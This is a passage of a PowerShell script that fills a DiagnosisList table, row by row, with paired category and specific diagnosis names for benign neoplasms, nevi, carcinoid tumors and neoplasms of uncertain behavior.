of small intestine","Benign neoplasm of unspecified part of small intestine") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified parts of small intestine","Benign neoplasm of other parts of small intestine") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of liver","Benign neoplasm of liver") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of extrahepatic bile ducts","Benign neoplasm of extrahepatic bile ducts") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of pancreas","Benign neoplasm of pancreas") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of endocrine pancreas","Benign neoplasm of endocrine pancreas") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ill-defined sites within the digestive system","Benign neoplasm of ill-defined sites within the digestive system") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of middle ear and respiratory system","Benign neoplasm of middle ear, nasal cavity and accessory sinuses") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of middle ear and respiratory system","Benign neoplasm of larynx") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of middle ear and respiratory system","Benign neoplasm of trachea") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of bronchus and lung","Benign neoplasm of unspecified bronchus and lung") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of bronchus and lung","Benign neoplasm of right bronchus and lung") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of bronchus and lung","Benign neoplasm of left bronchus and lung") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of respiratory system, unspecified","Benign neoplasm of respiratory system, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified intrathoracic organs","Benign neoplasm of thymus") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified intrathoracic organs","Benign neoplasm of heart") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified intrathoracic organs","Benign neoplasm of mediastinum") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified intrathoracic organs","Benign neoplasm of other specified intrathoracic organs") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified intrathoracic organs","Benign neoplasm of intrathoracic organ, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of scapula and long bones of upper limb","Benign neoplasm of scapula and long bones of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of scapula and long bones of upper limb","Benign neoplasm of scapula and long bones of right upper limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of scapula and long bones of upper limb","Benign neoplasm of scapula and long bones of left upper limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of short bones of upper limb","Benign neoplasm of short bones of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of short bones of upper limb","Benign neoplasm of short bones of right upper limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of short bones of upper limb","Benign neoplasm of short bones of left upper limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of long bones of lower limb","Benign neoplasm of long bones of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of long bones of lower limb","Benign neoplasm of long bones of right lower limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of long bones of lower limb","Benign neoplasm of long bones of left lower limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of short bones of lower limb","Benign neoplasm of short bones of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of short bones of lower limb","Benign neoplasm of short bones of right lower limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of short bones of lower limb","Benign neoplasm of short bones of left lower limb") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of bones of skull and face","Benign neoplasm of bones of skull and face") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of lower jaw bone","Benign neoplasm of lower jaw bone") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of vertebral column","Benign neoplasm of vertebral column") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ribs, sternum and clavicle","Benign neoplasm of ribs, sternum and clavicle") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of pelvic bones, sacrum and coccyx","Benign neoplasm of pelvic bones, sacrum and coccyx") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of bone and articular cartilage, unspecified","Benign neoplasm of bone and articular cartilage, unspecified") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm","Benign lipomatous neoplasm of skin and subcutaneous tissue of head, face and neck") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm","Benign lipomatous neoplasm of skin and subcutaneous tissue of trunk") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of skin and subcutaneous tissue of limb","Benign lipomatous neoplasm of skin and subcutaneous tissue of unspecified limb") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of skin and subcutaneous tissue of limb","Benign lipomatous neoplasm of skin and subcutaneous tissue of right arm") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of skin and subcutaneous tissue of limb","Benign lipomatous neoplasm of skin and subcutaneous tissue of left arm") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of skin and subcutaneous tissue of limb","Benign lipomatous neoplasm of skin and subcutaneous tissue of right leg") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of skin and subcutaneous tissue of limb","Benign lipomatous neoplasm of skin and subcutaneous tissue of left leg") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of skin and subcutaneous tissue of other and unspecified sites","Benign lipomatous neoplasm of skin and subcutaneous tissue of unspecified sites") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of skin and subcutaneous tissue of other and unspecified sites","Benign lipomatous neoplasm of skin and subcutaneous tissue of other sites") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of intrathoracic organs","Benign lipomatous neoplasm of intrathoracic organs") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of intra-abdominal organs","Benign lipomatous neoplasm of intra-abdominal organs") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of spermatic cord","Benign lipomatous neoplasm of spermatic cord") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of other sites","Benign lipomatous neoplasm of kidney") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of other sites","Benign lipomatous neoplasm of other genitourinary organ") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm of other sites","Benign lipomatous neoplasm of other sites") + $null = $DiagnosisList.Rows.Add("Benign lipomatous neoplasm, unspecified","Benign lipomatous neoplasm, unspecified") + $null = $DiagnosisList.Rows.Add("Hemangioma","Hemangioma unspecified site") + $null = $DiagnosisList.Rows.Add("Hemangioma","Hemangioma of skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Hemangioma","Hemangioma of intracranial structures") + $null = $DiagnosisList.Rows.Add("Hemangioma","Hemangioma of intra-abdominal structures") + $null = $DiagnosisList.Rows.Add("Hemangioma","Hemangioma of other sites") + $null = $DiagnosisList.Rows.Add("Lymphangioma, any site","Lymphangioma, any site") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of mesothelial tissue","Benign neoplasm of mesothelial tissue of pleura") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of mesothelial tissue","Benign neoplasm of mesothelial tissue of peritoneum") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of mesothelial tissue","Benign neoplasm of mesothelial tissue of other sites") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of mesothelial tissue","Benign neoplasm of mesothelial tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of soft tissue of retroperitoneum and peritoneum","Benign neoplasm of soft tissue of retroperitoneum") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of soft tissue of retroperitoneum and peritoneum","Benign neoplasm of soft tissue of peritoneum") + $null = $DiagnosisList.Rows.Add("Other benign neoplasms of connective and other soft tissue","Benign neoplasm of connective and other soft tissue of head, face and neck") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of upper limb, including shoulder","Benign neoplasm of connective and other soft tissue of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of upper limb, including shoulder","Benign neoplasm of connective and other soft tissue of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of upper limb, including shoulder","Benign neoplasm of connective and other soft tissue of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of lower limb, including hip","Benign neoplasm of connective and other soft tissue of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of lower limb, including hip","Benign neoplasm of connective and other soft tissue of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of lower limb, including hip","Benign neoplasm of connective and other soft tissue of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of thorax","Benign neoplasm of connective and other soft tissue of thorax") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of abdomen","Benign neoplasm of connective and other soft tissue of abdomen") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of pelvis","Benign neoplasm of connective and other soft tissue of pelvis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue of trunk, unspecified","Benign neoplasm of connective and other soft tissue of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of connective and other soft tissue, unspecified","Benign neoplasm of connective and other soft tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi","Melanocytic nevi of lip") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of eyelid, including canthus","Melanocytic nevi of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of eyelid, including canthus","Melanocytic nevi of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of eyelid, including canthus","Melanocytic nevi of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of ear and external auricular canal","Melanocytic nevi of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of ear and external auricular canal","Melanocytic nevi of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of ear and external auricular canal","Melanocytic nevi of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of other and unspecified parts of face","Melanocytic nevi of unspecified part of face") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of other and unspecified parts of face","Melanocytic nevi of other parts of face") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of scalp and neck","Melanocytic nevi of scalp and neck") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of trunk","Melanocytic nevi of trunk") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of upper limb, including shoulder","Melanocytic nevi of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of upper limb, including shoulder","Melanocytic nevi of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of upper limb, including shoulder","Melanocytic nevi of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of lower limb, including hip","Melanocytic nevi of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of lower limb, including hip","Melanocytic nevi of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi of lower limb, including hip","Melanocytic nevi of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Melanocytic nevi, unspecified","Melanocytic nevi, unspecified") + $null = $DiagnosisList.Rows.Add("Other benign neoplasms of skin","Other benign neoplasm of skin of lip") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of eyelid, including canthus","Other benign neoplasm of skin of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of eyelid, including canthus","Other benign neoplasm of skin of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of eyelid, including canthus","Other benign neoplasm of skin of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of ear and external auricular canal","Other benign neoplasm of skin of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of ear and external auricular canal","Other benign neoplasm of skin of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of ear and external auricular canal","Other benign neoplasm of skin of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of other and unspecified parts of face","Other benign neoplasm of skin of unspecified part of face") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of other and unspecified parts of face","Other benign neoplasm of skin of other parts of face") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of scalp and neck","Other benign neoplasm of skin of scalp and neck") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of trunk","Other benign neoplasm of skin of trunk") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of upper limb, including shoulder","Other benign neoplasm of skin of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of upper limb, including shoulder","Other benign neoplasm of skin of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of upper limb, including shoulder","Other benign neoplasm of skin of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of lower limb, including hip","Other benign neoplasm of skin of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of lower limb, including hip","Other benign neoplasm of skin of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin of lower limb, including hip","Other benign neoplasm of skin of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Other benign neoplasm of skin, unspecified","Other benign neoplasm of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of breast","Benign neoplasm of right breast") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of breast","Benign neoplasm of left breast") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of breast","Benign neoplasm of unspecified breast") + $null = $DiagnosisList.Rows.Add("Leiomyoma of uterus","Submucous leiomyoma of uterus") + $null = $DiagnosisList.Rows.Add("Leiomyoma of uterus","Intramural leiomyoma of uterus") + $null = $DiagnosisList.Rows.Add("Leiomyoma of uterus","Subserosal leiomyoma of uterus") + $null = $DiagnosisList.Rows.Add("Leiomyoma of uterus","Leiomyoma of uterus, unspecified") + $null = $DiagnosisList.Rows.Add("Other benign neoplasms of uterus","Other benign neoplasm of cervix uteri") + $null = $DiagnosisList.Rows.Add("Other benign neoplasms of uterus","Other benign neoplasm of corpus uteri") + $null = $DiagnosisList.Rows.Add("Other benign neoplasms of uterus","Other benign neoplasm of other parts of uterus") + $null = $DiagnosisList.Rows.Add("Other benign neoplasms of uterus","Other benign neoplasm of uterus, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ovary","Benign neoplasm of right ovary") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ovary","Benign neoplasm of left ovary") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ovary","Benign neoplasm of unspecified ovary") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified female genital organs","Benign neoplasm of vulva") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified female genital organs","Benign neoplasm of vagina") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified female genital organs","Benign neoplasm of uterine tubes and ligaments") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified female genital organs","Benign neoplasm of other specified female genital organs") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified female genital organs","Benign neoplasm of female genital organ, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of male genital organs","Benign neoplasm of penis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of male genital organs","Benign neoplasm of prostate") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of testis","Benign neoplasm of unspecified testis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of testis","Benign neoplasm of right testis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of testis","Benign neoplasm of left testis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of epididymis","Benign neoplasm of unspecified epididymis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of epididymis","Benign neoplasm of right epididymis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of epididymis","Benign neoplasm of left epididymis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of scrotum","Benign neoplasm of scrotum") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other specified male genital organs","Benign neoplasm of other specified male genital organs") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of male genital organ, unspecified","Benign neoplasm of male genital organ, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of kidney","Benign neoplasm of unspecified kidney") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of kidney","Benign neoplasm of right kidney") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of kidney","Benign neoplasm of left kidney") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of renal pelvis","Benign neoplasm of unspecified renal pelvis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of renal pelvis","Benign neoplasm of right renal pelvis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of renal pelvis","Benign neoplasm of left renal pelvis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ureter","Benign neoplasm of unspecified ureter") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ureter","Benign neoplasm of right ureter") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ureter","Benign neoplasm of left ureter") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of bladder","Benign neoplasm of bladder") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of urethra","Benign neoplasm of urethra") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other specified urinary organs","Benign neoplasm of other specified urinary organs") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of urinary organ, unspecified","Benign neoplasm of urinary organ, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of conjunctiva","Benign neoplasm of unspecified conjunctiva") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of conjunctiva","Benign neoplasm of right conjunctiva") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of conjunctiva","Benign neoplasm of left conjunctiva") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of cornea","Benign neoplasm of unspecified cornea") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of cornea","Benign neoplasm of right cornea") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of cornea","Benign neoplasm of left cornea") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of retina","Benign neoplasm of unspecified retina") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of retina","Benign neoplasm of right retina") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of retina","Benign neoplasm of left retina") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of choroid","Benign neoplasm of unspecified choroid") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of choroid","Benign neoplasm of right choroid") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of choroid","Benign neoplasm of left choroid") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ciliary body","Benign neoplasm of unspecified ciliary body") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ciliary body","Benign neoplasm of right ciliary body") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of ciliary body","Benign neoplasm of left ciliary body") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of lacrimal gland and duct","Benign neoplasm of unspecified lacrimal gland and duct") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of lacrimal gland and duct","Benign neoplasm of right lacrimal gland and duct") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of lacrimal gland and duct","Benign neoplasm of left lacrimal gland and duct") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of unspecified site of orbit","Benign neoplasm of unspecified site of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of unspecified site of orbit","Benign neoplasm of unspecified site of right orbit") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of unspecified site of orbit","Benign neoplasm of unspecified site of left orbit") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of unspecified part of eye","Benign neoplasm of unspecified part of unspecified eye") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of unspecified part of eye","Benign neoplasm of unspecified part of right eye") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of unspecified part of eye","Benign neoplasm of unspecified part of left eye") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of meninges","Benign neoplasm of cerebral meninges") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of meninges","Benign neoplasm of spinal meninges") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of meninges","Benign neoplasm of meninges, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of brain and other parts of central nervous system","Benign neoplasm of brain, supratentorial") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of brain and other parts of central nervous system","Benign neoplasm of brain, infratentorial") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of brain and other parts of central nervous system","Benign neoplasm of brain, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of brain and other parts of central nervous system","Benign neoplasm of cranial nerves") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of brain and other parts of central nervous system","Benign neoplasm of spinal cord") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of brain and other parts of central nervous system","Benign neoplasm of other specified parts of central nervous system") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of brain and other parts of central nervous system","Benign neoplasm of central nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of thyroid gland","Benign neoplasm of thyroid gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of adrenal gland","Benign neoplasm of unspecified adrenal gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of adrenal gland","Benign neoplasm of right adrenal gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of adrenal gland","Benign neoplasm of left adrenal gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of parathyroid gland","Benign neoplasm of parathyroid gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of pituitary gland","Benign neoplasm of pituitary gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of craniopharyngeal duct","Benign neoplasm of craniopharyngeal duct") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of pineal gland","Benign neoplasm of pineal gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of carotid body","Benign neoplasm of carotid body") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of aortic body and other paraganglia","Benign neoplasm of aortic body and other paraganglia") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other specified endocrine glands","Benign neoplasm of other specified endocrine glands") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of endocrine gland, unspecified","Benign neoplasm of endocrine gland, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified sites","Benign neoplasm of lymph nodes") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system of face, head, and neck") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system, upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system of lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system of thorax") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system of abdomen") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system of pelvis") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of peripheral nerves and autonomic nervous system","Benign neoplasm of peripheral nerves and autonomic nervous system of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other specified sites","Benign neoplasm of other specified sites") + $null = $DiagnosisList.Rows.Add("Benign neoplasm, unspecified site","Benign neoplasm, unspecified site") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors","Benign carcinoid tumor of unspecified site") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the small intestine","Benign carcinoid tumor of the duodenum") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the small intestine","Benign carcinoid tumor of the jejunum") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the small intestine","Benign carcinoid tumor of the ileum") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the small intestine","Benign carcinoid tumor of the small intestine, unspecified portion") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the appendix") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the cecum") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the ascending colon") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the transverse colon") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the descending colon") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the sigmoid colon") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the rectum") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of the appendix, large intestine, and rectum","Benign carcinoid tumor of the large intestine, unspecified portion") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumor of the bronchus and lung") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumor of the thymus") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumor of the stomach") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumor of the kidney") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumor of the foregut, unspecified") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumor of the midgut, unspecified") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumor of the hindgut, unspecified") + $null = $DiagnosisList.Rows.Add("Benign carcinoid tumors of other sites","Benign carcinoid tumors of other sites") + $null = $DiagnosisList.Rows.Add("Other benign neuroendocrine tumors","Other benign neuroendocrine tumors") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of lip, oral cavity and pharynx","Neoplasm of uncertain behavior of lip") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of lip, oral cavity and pharynx","Neoplasm of uncertain behavior of tongue") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of the major salivary glands","Neoplasm of uncertain behavior of the parotid salivary glands") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of the major salivary glands","Neoplasm of uncertain behavior of the sublingual salivary glands") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of the major salivary glands","Neoplasm of uncertain behavior of the submandibular salivary glands") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of the major salivary glands","Neoplasm of uncertain behavior of the major salivary glands, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of the minor salivary glands","Neoplasm of uncertain behavior of the minor salivary glands") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of pharynx","Neoplasm of uncertain behavior of pharynx") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other specified sites of the oral cavity","Neoplasm of uncertain behavior of other specified sites of the oral cavity") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of stomach","Neoplasm of uncertain behavior of stomach") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of small intestine","Neoplasm of uncertain behavior of small intestine") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of appendix","Neoplasm of uncertain behavior of appendix") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of colon","Neoplasm of uncertain behavior of colon") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of rectum","Neoplasm of uncertain behavior of rectum") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of liver, gallbladder and bile ducts","Neoplasm of uncertain behavior of liver, gallbladder and bile ducts") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of other specified digestive organs","Neoplasm of uncertain behavior of other specified digestive organs") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of digestive organ, unspecified","Neoplasm of uncertain behavior of digestive organ, unspecified") + $null = $DiagnosisList.Rows.Add("Neoplasm of uncertain behavior of middle ear and respiratory and intrathoracic 